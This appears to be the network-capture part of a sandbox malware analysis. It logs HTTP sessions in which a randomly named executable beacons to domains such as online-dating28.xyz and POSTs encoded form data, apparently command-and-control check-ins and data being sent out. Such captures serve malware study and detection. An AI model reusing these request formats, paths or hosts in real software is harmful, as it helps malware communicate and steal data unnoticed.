Oct 7, 2024 11:52:39.731892109 CEST	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Mon, 07 Oct 2024 09:52:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.30	49784	217.70.184.50	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:42.257700920 CEST	398	OUT	GET /phw5/?0zu8A=o2yln6&VzK4o8Jx=0nIKn1KaCpmASYJA4heXTZJ4jJXOLVPKLZ7pkMbHJLxIA/G7tzth6jzDxIdIFtsfCbXgmV5eiC0y9vkRZyS1XzB4D/cnp4pLqlHudh8ra46zD/kGcOWFXek= HTTP/1.1 Host: www.redlakedispensery.net Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:52:42.427572966 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 09:52:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Data Raw: 37 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 72 65 64 6c 61 6b 65 64 69 73 70 65 6e 73 65 72 79 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 [TRUNCATED] Data Ascii: 7b5<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>redlakedispensery.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="ht [TRUNCATED]
Oct 7, 2024 11:52:42.427644014 CEST	880	IN	Data Raw: 73 75 6c 74 73 20 6f 66 20 72 65 64 6c 61 6b 65 64 69 73 70 65 6e 73 65 72 79 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 Data Ascii: sults of redlakedispensery.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span clas
Oct 7, 2024 11:52:42.427654982 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.30	49785	199.59.243.227	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:47.689922094 CEST	677	OUT	POST /6nb6/ HTTP/1.1 Host: www.online-dating28.xyz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.online-dating28.xyz Referer: http://www.online-dating28.xyz/6nb6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 36 65 34 39 73 61 58 39 44 53 53 74 30 43 43 78 4a 55 51 37 78 69 37 32 6b 78 37 44 67 63 52 51 54 4b 55 67 50 4a 58 74 6e 4c 34 71 34 57 6c 37 39 77 6c 33 51 6e 6d 56 37 4f 79 63 6c 49 74 46 66 78 41 57 6f 43 52 49 6c 56 55 44 6f 53 45 79 74 6c 77 67 6e 75 2b 34 2f 57 54 36 68 5a 65 2f 37 4b 46 6d 78 32 48 4d 63 64 4c 4a 44 79 73 52 2f 72 68 78 58 70 6a 67 67 48 37 41 6f 34 4d 42 33 2f 44 4b 52 49 52 52 32 64 46 75 55 37 70 7a 46 42 2f 75 73 55 6d 44 6f 30 37 4f 79 39 4e 65 54 38 47 57 5a 6f 4d 68 32 30 50 4b 6d 55 56 4e 4e 6e 57 6d 34 38 59 75 61 36 70 41 45 37 4f 48 2f 77 3d 3d Data Ascii: VzK4o8Jx=6e49saX9DSSt0CCxJUQ7xi72kx7DgcRQTKUgPJXtnL4q4Wl79wl3QnmV7OyclItFfxAWoCRIlVUDoSEytlwgnu+4/WT6hZe/7KFmx2HMcdLJDysR/rhxXpjggH7Ao4MB3/DKRIRR2dFuU7pzFB/usUmDo07Oy9NeT8GWZoMh20PKmUVNNnWm48Yua6pAE7OH/w==
Oct 7, 2024 11:52:47.791769028 CEST	1289	IN	HTTP/1.1 200 OK date: Mon, 07 Oct 2024 09:52:46 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: 13f801f1-d326-4885-be77-3ee6924814b1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg== set-cookie: parking_session=13f801f1-d326-4885-be77-3ee6924814b1; expires=Mon, 07 Oct 2024 10:07:47 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 4e 4a 31 4b 35 49 63 2b 62 4e 6e 6f 39 78 62 6d 68 32 67 61 71 2b 73 2b 7a 46 45 59 64 63 34 79 51 57 79 67 46 4d 49 6f 45 4e 34 46 42 73 59 2b 63 6c 63 64 31 49 44 7a 2b 41 4c 36 39 57 74 73 7a 4c 67 45 37 6b 37 35 31 63 47 71 4e 39 62 57 31 47 54 47 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 7, 2024 11:52:47.791790962 CEST	546	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTNmODAxZjEtZDMyNi00ODg1LWJlNzctM2VlNjkyNDgxNGIxIiwicGFnZV90aW1lIjoxNzI4Mjk0NzY3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub25saW5lLWRhdGluZzI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.30	49786	199.59.243.227	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:50.325870037 CEST	697	OUT	POST /6nb6/ HTTP/1.1 Host: www.online-dating28.xyz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.online-dating28.xyz Referer: http://www.online-dating28.xyz/6nb6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 36 65 34 39 73 61 58 39 44 53 53 74 31 69 79 78 47 54 45 37 67 53 37 31 72 52 37 44 70 38 52 55 54 4b 59 67 50 4d 75 77 6e 35 73 71 2f 32 31 37 38 79 4e 33 58 6e 6d 56 70 75 79 64 34 34 73 4a 66 78 45 6f 6f 43 74 49 6c 56 41 44 6f 51 73 79 75 53 46 32 6b 65 2b 41 6b 6d 54 43 76 35 65 2f 37 4b 46 6d 78 32 6a 6d 63 64 54 4a 43 43 63 52 2b 4b 68 2b 5a 4a 6a 68 77 6e 37 41 73 34 4d 4e 33 2f 44 30 52 4e 4a 72 32 65 39 75 55 2f 6c 7a 47 54 48 74 31 6b 6e 49 73 30 37 63 32 49 52 56 56 4f 4b 48 53 4c 30 5a 36 46 4c 2b 71 6a 6b 58 51 6b 69 6b 72 63 6b 44 47 37 45 6f 47 35 50 63 69 7a 6f 75 73 35 35 57 47 35 41 74 5a 54 4f 74 4b 48 61 49 2b 57 4d 3d Data Ascii: VzK4o8Jx=6e49saX9DSSt1iyxGTE7gS71rR7Dp8RUTKYgPMuwn5sq/2178yN3XnmVpuyd44sJfxEooCtIlVADoQsyuSF2ke+AkmTCv5e/7KFmx2jmcdTJCCcR+Kh+ZJjhwn7As4MN3/D0RNJr2e9uU/lzGTHt1knIs07c2IRVVOKHSL0Z6FL+qjkXQkikrckDG7EoG5Pcizous55WG5AtZTOtKHaI+WM=
Oct 7, 2024 11:52:50.427710056 CEST	1289	IN	HTTP/1.1 200 OK date: Mon, 07 Oct 2024 09:52:50 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: 1fbe2107-c55a-43a5-958b-ca86eb016aea cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg== set-cookie: parking_session=1fbe2107-c55a-43a5-958b-ca86eb016aea; expires=Mon, 07 Oct 2024 10:07:50 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 4e 4a 31 4b 35 49 63 2b 62 4e 6e 6f 39 78 62 6d 68 32 67 61 71 2b 73 2b 7a 46 45 59 64 63 34 79 51 57 79 67 46 4d 49 6f 45 4e 34 46 42 73 59 2b 63 6c 63 64 31 49 44 7a 2b 41 4c 36 39 57 74 73 7a 4c 67 45 37 6b 37 35 31 63 47 71 4e 39 62 57 31 47 54 47 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 7, 2024 11:52:50.427748919 CEST	546	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZiZTIxMDctYzU1YS00M2E1LTk1OGItY2E4NmViMDE2YWVhIiwicGFnZV90aW1lIjoxNzI4Mjk0NzcwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub25saW5lLWRhdGluZzI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.30	49787	199.59.243.227	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:52.967976093 CEST	3814	OUT	POST /6nb6/ HTTP/1.1 Host: www.online-dating28.xyz Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.online-dating28.xyz Referer: http://www.online-dating28.xyz/6nb6/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 36 65 34 39 73 61 58 39 44 53 53 74 31 69 79 78 47 54 45 37 67 53 37 31 72 52 37 44 70 38 52 55 54 4b 59 67 50 4d 75 77 6e 35 55 71 34 45 4e 37 39 54 4e 33 57 6e 6d 56 79 75 79 51 34 34 73 45 66 31 6f 53 6f 43 67 39 6c 58 34 44 36 44 55 79 35 54 46 32 2f 75 2b 41 37 57 54 35 68 5a 65 75 37 4b 31 69 78 32 54 6d 63 64 54 4a 43 45 51 52 75 72 68 2b 55 70 6a 67 67 48 36 53 6f 34 4d 70 33 2f 62 6b 52 4d 38 4a 32 63 74 75 55 75 31 7a 46 67 2f 74 31 6b 6e 49 72 30 37 66 32 49 56 57 56 4e 36 62 53 50 6f 6a 36 78 4c 2b 36 6b 5a 2f 45 6d 53 47 32 50 78 4f 44 36 30 51 41 62 58 57 6e 7a 49 49 2f 36 68 77 52 5a 49 54 53 7a 43 32 4f 58 72 4e 6c 69 78 43 4c 6d 49 4e 30 53 76 69 30 63 38 6a 4e 71 4d 79 55 53 71 35 57 6b 33 75 54 6d 31 38 65 58 64 79 46 6e 6d 48 6f 6d 63 42 37 6c 45 53 43 73 44 31 30 65 5a 64 42 2b 33 78 50 45 56 59 6f 30 78 56 74 45 30 6d 48 6d 34 4a 2f 69 7a 53 32 6b 4f 72 6b 6f 57 33 30 53 65 38 53 30 6c 56 37 31 4d 73 6f 2b 77 6e 70 57 48 36 64 47 6b 42 4c 43 57 6b 67 [TRUNCATED] Data Ascii: VzK4o8Jx=6e49saX9DSSt1iyxGTE7gS71rR7Dp8RUTKYgPMuwn5Uq4EN79TN3WnmVyuyQ44sEf1oSoCg9lX4D6DUy5TF2/u+A7WT5hZeu7K1ix2TmcdTJCEQRurh+UpjggH6So4Mp3/bkRM8J2ctuUu1zFg/t1knIr07f2IVWVN6bSPoj6xL+6kZ/EmSG2PxOD60QAbXWnzII/6hwRZITSzC2OXrNlixCLmIN0Svi0c8jNqMyUSq5Wk3uTm18eXdyFnmHomcB7lESCsD10eZdB+3xPEVYo0xVtE0mHm4J/izS2kOrkoW30Se8S0lV71Mso+wnpWH6dGkBLCWkgQeYVeiP8s5/ANPBsx038J0ruzA/vQO/aGljw7+dhuKz4UM3VarNCu7hXQnWqSPOcyf7eFsJXOyCYpfRYTFPS2MpKbiLPkGrdo7i/2rAbShA+p00ZPo9wkerHO55IPas0TzrrJzDRNY6CDz7G7EuZ1MDj1I3pDG+/iPnTB8nTvkQ8haxcUVrra3TueH8iPFLJ7aeFrK98pn6Y7hDDbWNk5NaQMX57DSErc+y9y+hYlHSj4Ww1jbOydAtlO769b6C5dfaxyxsgnKrWDYIfp8Y8qtCt3yuxjiZgx4VBHaMVZAlqkeUHjLYL7CAmCF34itMhZxjd7GricPWlW04If0uBzPhZnEhrFlc3yTVYRMKynC95+sPwg1a+SHq5WgynBWNmvEbeQW47HPijy6iI2gWF60YyOZCGf3tBEvXaXLMRNGUopYjhHJqXIrbyRTPllJBXjTn2w8UG5tEgNd4KdzZ91HhC3AvTGoR4tuCzTYxeor4mNiwykIo2gVa5r8xL0NeBIC7UbBo+kvLOQmjHd325Thv/iGEwX0bHSUPch0v0gL+iWUnrwCoBCH/ru6TDTJKv8ZrQEynyLUhqg2ceZxBky9etvsM+pg+m+Q49qxLghEJFh8O4DKhkDXP6kYI7IPca2evYAgazvVRK70/XgVlIhXZHAux8CyHbOi [TRUNCATED]
Oct 7, 2024 11:52:53.070846081 CEST	1289	IN	HTTP/1.1 200 OK date: Mon, 07 Oct 2024 09:52:52 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: af1fa924-dee9-47ef-a668-f2e69e124e09 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg== set-cookie: parking_session=af1fa924-dee9-47ef-a668-f2e69e124e09; expires=Mon, 07 Oct 2024 10:07:53 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 4e 4a 31 4b 35 49 63 2b 62 4e 6e 6f 39 78 62 6d 68 32 67 61 71 2b 73 2b 7a 46 45 59 64 63 34 79 51 57 79 67 46 4d 49 6f 45 4e 34 46 42 73 59 2b 63 6c 63 64 31 49 44 7a 2b 41 4c 36 39 57 74 73 7a 4c 67 45 37 6b 37 35 31 63 47 71 4e 39 62 57 31 47 54 47 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pNJ1K5Ic+bNno9xbmh2gaq+s+zFEYdc4yQWygFMIoEN4FBsY+clcd1IDz+AL69WtszLgE7k751cGqN9bW1GTGg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 7, 2024 11:52:53.071100950 CEST	546	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWYxZmE5MjQtZGVlOS00N2VmLWE2NjgtZjJlNjllMTI0ZTA5IiwicGFnZV90aW1lIjoxNzI4Mjk0NzczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub25saW5lLWRhdGluZzI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.30	49788	199.59.243.227	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:55.602654934 CEST	396	OUT	GET /6nb6/?VzK4o8Jx=3cQdvvjXbDmN7AD1N3EtkTKSkRGpjOZJD5QOEJ2ov7AVnEoT92w2clvWuemcxfAXa005+24inGIyqDI1tlEn9qii/G7LnY+t45dZlk7rRI6PB0gsuL5FdqU=&0zu8A=o2yln6 HTTP/1.1 Host: www.online-dating28.xyz Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
